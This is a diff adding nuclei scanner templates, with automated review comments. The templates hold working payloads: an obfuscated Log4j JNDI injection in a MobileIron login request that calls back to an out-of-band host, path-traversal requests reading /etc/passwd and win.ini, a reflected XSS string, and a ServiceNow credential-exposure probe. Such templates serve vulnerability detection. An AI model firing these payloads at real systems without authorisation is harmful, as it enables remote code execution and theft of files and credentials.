- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output


@ -0,0 +1,41 @@
id: mobileiron-log4j-jndi-rce
info:
name: MobileIron Log4J JNDI RCE
author: meme-lord
severity: high
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
- https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron
tags: rce,jndi,oast,log4j,mobileiron
requests:
- raw:
- |
POST /mifs/j_spring_security_check HTTP/1.1
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
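Review bot: The raw POST in the new mobileiron-log4j-jndi-rce template carries `Referer` and `Content-Type` headers but no `Host: {{Hostname}}` line, which every other raw request in this commit includes (apache-ofbiz-log4j-rce, CVE-2021-44848, api-bitrise); unless nuclei injects one, the request is not valid HTTP/1.1 and some front ends will reject it before it reaches the login handler. Adding `Host: {{Hostname}}` after the request line, and a blank line between the headers and the form body if the rendering here dropped it, is worth checking. Severity is `high` while the CVE-2021-44228 template in the same commit uses `critical` for the same vulnerability class; align them or note why this one is rated lower.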


@ -0,0 +1,25 @@
id: asanhamayesh-lfi
info:
name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018030006
- https://asanhamayesh.com
tags: asanhamayesh,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
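Review bot: The new asanhamayesh-lfi template has no `description` under `info`, and the same applies to global-domains-lfi, global-domains-xss, groupoffice-lfi and pacsone-server-lfi added in this commit, while the other new vulnerability templates (oliver-library-lfi, servicenow-helpdesk-credential) document what they detect. A one-sentence description of the affected parameter and the file read, e.g. `description: Asanhamayesh CMS 3.4.6 allows reading arbitrary files through the file parameter of downloadfile.php.`, gives the reader of a result the context the reference URL alone does not.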


@ -0,0 +1,25 @@
id: global-domains-lfi
info:
name: Global Domains International Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020247
- http://www.nic.ws
tags: globaldomains,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: global-domains-xss
info:
name: Global Domains International XSS
author: princechaddha
severity: medium
reference: https://cxsecurity.com/issue/WLB-2018020247
tags: globaldomains,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,26 @@
id: groupoffice-lfi
info:
name: Groupoffice 3.4.21 Directory Traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020249
- http://www.group-office.com
tags: groupoffice,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: oliver-library-lfi
info:
name: Oliver Library Server v5 - Arbitrary File Download
author: gy741
severity: high
description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
reference:
- https://www.exploit-db.com/exploits/50599
- https://www.softlinkint.com/product/oliver/
tags: windows,lfi,oliver
requests:
- method: GET
path:
- "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and


@ -0,0 +1,23 @@
id: pacsone-server-lfi
info:
name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2018010303
tags: pacsone,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
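Review bot: The `name` of the new pacsone-server-lfi template misspells the vulnerability class: `Directory Trasversal` should be `Directory Traversal`, i.e. `name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Traversal`. This string is what appears in scan output, so the typo propagates to every report. The template also has no `description`, like several other templates added in this commit.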


@ -0,0 +1,32 @@
id: servicenow-helpdesk-credential
info:
name: ServiceNow Helpdesk Credential Exposure
author: ok_bye_now
severity: high
description: Detection of exposed credentials in help the help desk JS file.
reference: https://jordanpotti.com/2021/02/21/ServiceNow-HelpTheHelpDeskAndTheHackers/
tags: servicenow,exposure
requests:
- method: GET
path:
- "{{RootURL}}/HelpTheHelpDesk.jsdbx"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'var httpPassword = "encrypt:'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- 'var server = "([a-z:/0-9.-]+)"'
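Review bot: The description on the new servicenow-helpdesk-credential template, `Detection of exposed credentials in help the help desk JS file.`, has a garbled phrase; `description: Detects credentials exposed in the ServiceNow HelpTheHelpDesk.jsdbx script.` names the file the request actually fetches. The extractor `var server = "([a-z:/0-9.-]+)"` would miss server values containing upper-case letters or an underscore; if the referenced write-up shows such values, widen the class accordingly.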


@ -28,11 +28,11 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output


@ -6,8 +6,6 @@ info:
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- tags: wordpress
- template: technologies/wordpress-detect.yaml
subtemplates:
- tags: wordpress